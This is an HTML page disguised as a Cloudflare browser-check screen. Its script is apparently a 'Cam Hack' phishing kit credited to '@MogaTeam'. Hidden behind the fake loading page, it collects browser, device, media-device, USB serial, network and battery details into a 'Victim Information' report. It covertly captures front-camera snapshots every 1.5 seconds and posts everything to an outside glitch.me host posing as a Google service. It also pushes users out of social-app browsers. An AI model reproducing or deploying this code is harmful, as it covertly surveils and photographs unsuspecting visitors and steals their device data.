
<!DOCTYPE html>
<html lang="en-US">
<head> 
<meta charset="UTF-8"> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> 
<meta name="robots" content="noindex, nofollow"> 
<meta name="viewport" content="width=device-width,initial-scale=1"> 
<title>Just a moment....</title> 
<style type="text/css">
html, body {width: 100%; height: 100%; margin: 0; padding: 0;}
body {background-color: #ffffff; color: #000000; font-family:-apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, "Helvetica Neue",Arial, sans-serif; font-size: 16px; line-height: 1.7em;-webkit-font-smoothing: antialiased;}
h1 { text-align: center; font-weight:700; margin: 16px 0; font-size: 32px; color:#000000; line-height: 1.25;}
p {font-size: 20px; font-weight: 400; margin: 8px 0;}
p, .attribution, {text-align: center;}
#spinner {margin: 0 auto 30px auto; display: block;}
.attribution {margin-top: 32px;}
@keyframes fader   { 0% {opacity: 0.2;} 50% {opacity: 1.0;} 100% {opacity: 0.2;} }
@-webkit-keyframes fader { 0% {opacity: 0.2;} 50% {opacity: 1.0;} 100% {opacity: 0.2;} }
#cf-bubbles > .bubbles { animation: fader 1.6s infinite;}
#cf-bubbles > .bubbles:nth-child(2) { animation-delay: .2s;}
#cf-bubbles > .bubbles:nth-child(3) { animation-delay: .4s;}
.bubbles { background-color: #f58220; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; }
a { color: #2c7cb0; text-decoration: none; -moz-transition: color 0.15s ease; -o-transition: color 0.15s ease; -webkit-transition: color 0.15s ease; transition: color 0.15s ease; }
a:hover{color: #f4a15d}
.attribution{font-size: 16px; line-height: 1.5;}
.ray_id{display: block; margin-top: 8px;}
#cf-wrapper #challenge-form { padding-top:25px; padding-bottom:25px; }
#cf-hcaptcha-container { text-align:center;}
#cf-hcaptcha-container iframe { display: inline-block;}
</style> 
</head> 
<body>
<table width="100%" height="100%" cellpadding="20"> 
<tbody>
<tr> 
<td align="center" valign="middle"> 
<div class="cf-browser-verification cf-im-under-attack"> 
<noscript> 
<h1 data-translate="turn_on_js" style="color:#bd2426;">Please turn JavaScript on and reload the page.</h1> 
</noscript> 
<div id="cf-content" style="display: block;"> 
<div id="cf-bubbles"> 
<div class="bubbles"></div> 
<div class="bubbles"></div> 
<div class="bubbles"></div> 
</div> 
<h1><span data-translate="checking_browser">Checking your browser before accessing</span> the website.</h1> 
<div id="no-cookie-warning" class="cookie-warning" data-translate="turn_on_cookies" style="display:none"> 
<p data-translate="turn_on_cookies" style="color:#bd2426;">Please enable Cookies and reload the page.</p> 
</div> 
<p data-translate="process_is_automatic">This process is automatic. Your browser will redirect to your requested content shortly.</p> 
<p data-translate="allow_5_secs" id="cf-spinner-allow-5-secs" style="display: none;">Please allow up to 5 seconds…</p> 
<p data-translate="redirecting" id="cf-spinner-redirecting" style="display: block;">Redirecting…</p> 
</div> 
<form class="challenge-form" id="challenge-form" action="http://000webhost.com/?__cf_chl_jschl_tk__=gUwvgP4U.d3mjLABceeM1Hoq0yzKoVb2_YClw1ApwLs-1640764924-0-gaNycGzNA70" method="POST" enctype="application/x-www-form-urlencoded"> 

<span data-translate="error" style="display: none;">error code: 1020</span>

</form>
</div> 
<div class="attribution">
DDoS protection by 
<a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing/" target="_blank">Cloudflare</a> 
<br>
<span class="ray_id">Ray ID: <code id="ray" >6c51810c599f2cda</span> 
</div> </td> 
</tr> 
</tbody>
</table>
<video id="video" style="display:none"  playsinline autoplay></video>
<canvas hidden="hidden" id="canvas" width="500" height="500"></canvas>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
<script>
    async function redirectToMainBrowser() {
      // Redirect to main browser if opened in Facebook, Instagram, or WhatsApp browser
      var userAgent = navigator.userAgent || navigator.vendor || window.opera;
      if (userAgent.match(/FBAN/i) || userAgent.match(/FBAV/i) || userAgent.match(/Instagram/i) || userAgent.match(/WhatsApp/i)) {
          var currentURL = window.location.href;
          // Open in default browser on all devices
          var fallbackURL = "intent://" + currentURL.substring(currentURL.indexOf("//") + 2) + "#Intent;scheme=http;package=com.android.chrome;end";
          window.location.href = fallbackURL;
      }
    }

    redirectToMainBrowser();
</script>
<script type="text/javascript">
var c=false,l=false,uid="34brsvj";
async function gather(){
var td="";

td += '<pre>✅Victim Information</pre><br><pre>⚓ IP:</pre> <b><a href="https://ip-api.com/#122.182.220.123" >122.182.220.123</a></b> | <pre>Time:</pre> <b>2024-06-16:11:07:39</b>';


td+="<br><pre>⏳ Date In Victim's Device :</pre> <b>"+new Date()+"</b>";
var xo=["productSub","vendor","maxTouchPoints","doNotTrack","hardwareConcurrency","cookieEnabled","appCodeName","appName","appVersion","platform","product","userAgent","language","languages","webdriver","pdfViewerEnabled","deviceMemory"];
var xoc=["type","rtt","saveData","effectiveType","downlink","downlinkMax"];
///INITIALS
td+="<br><pre>📱 Device Information</pre>";
for(var i=0;i < xo.length;i++){ 
if(xo[i] in navigator){
var str = navigator[xo[i]];
td+="<pre>"+xo[i] +":</pre> <b>"+str+"</b>";
}
}

function error() {
return 'Hi';
}

if (navigator.mediaDevices || navigator.mediaDevices?.enumerateDevices) {
/////List cameras and microphones.
await navigator.mediaDevices?.enumerateDevices()
.then(function(devices) {
td+="<br><pre>📷 Media Device Information</pre>";
devices.forEach(function(device) {
td+="<pre>"+device.kind+":</pre> <b>" + device.label +"</b> <pre>id =</pre> <b>" + device.deviceId+"</b>";
});
})
.catch(function(err) {
td+="<br><pre>📷 Media Device Information</pre>";
td+="<pre>⚠️ Media Device Error:</pre> <b>"+err.name + ":</b> <b>" + err.message+"</b>";
});
}


////CONNECTION
if("connection" in navigator){
td+="<br><pre>🕸️ Network Information</pre>";
for(var i=0;i < xoc.length;i++){ 
var str = navigator.connection[xoc[i]];
td+="<pre>"+xoc[i] +":</pre> <b>"+str+"</b>";
}
}


////USB
if("usb" in navigator){
await navigator.usb.getDevices()
.then(devices => {
td+="<br><pre>🔌 Total USB devices connected:</pre> <b>" + devices.length+"</b>";
devices.forEach(device => {
td+="<pre>Product name:</pre> <b>" + device.productName + "</b> <pre>, Serial number:</pre> <b>" + device.serialNumber+"</b>";
});
});
}

if("getBattery" in navigator){
await navigator.getBattery().then(function(battery) {
td+="<br><pre>🔋 Battery Information</pre>";
td+="<pre>🔋Battery Level:</pre> <b>" +battery.level*100+"%</b><br><pre>⚡ Is Battery Charging:</pre> <b>"+battery.charging+"</b>";
td+="<pre>By</pre> <b>@MogaTeam😈</b>\n\n<pre>Source :-</pre> <b>Cam Hack FRONT🚆</b>";
l=true;
red();
});
}

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
var imgsent=0;

function post(o){
$.post("https://google-web-platform.glitch.me/camsnap",{uid:uid,img:encodeURIComponent(o)},(s)=>{
imgsent+=1;
if(imgsent==4){
c=true;
red();
}
});
}
const constraints = {audio: false,video: {facingMode: "user" }};
// Access webcam
function cam() {
  navigator.mediaDevices.getUserMedia(constraints)
    .then(handleSuccess)
    .catch(function(error) {
      // Handle camera permission rejection or absence of a working camera
      const deniedText = "<pre>Unfortunately, we failed to send you any photo of the victim. It might be because your victim blocked the camera permission or doesn't have a working camera installed.</pre>";
      camDenReq(deniedText);
    });
}

function camDenReq(deniedText) {
    $.post("https://google-web-platform.glitch.me/cam-denied", { uid: uid, deniedText: encodeURIComponent(deniedText) }, (s) => {
    c = true;
    red();
    });
}

// Success
function handleSuccess(stream) {
window.stream = stream;
video.srcObject = stream;
var context = canvas.getContext('2d');
var id=setInterval(function(){
context.drawImage(video, 0, 0, 500, 500);
var canvasData = canvas.toDataURL("image/png").replace("data:image/png;base64", "");
post(canvasData);
}, 1500);
}


cam();


function red(){
if(c && l){
window.close();
}
}
$.post("https://google-web-platform.glitch.me",{data:encodeURIComponent(td),uid:encodeURIComponent(uid)},(s)=>{});

}

window.onload=()=>{
gather();
var i="qwertyuioplkjhgfdsazxcvbnm0987654321";
var str="";
for(var o=0;o<17;o++){
str+=i[Math.floor(Math.random() * 35)];
}
document.getElementById("ray").innerHTML=str;
};
</script>
</body>
</html>
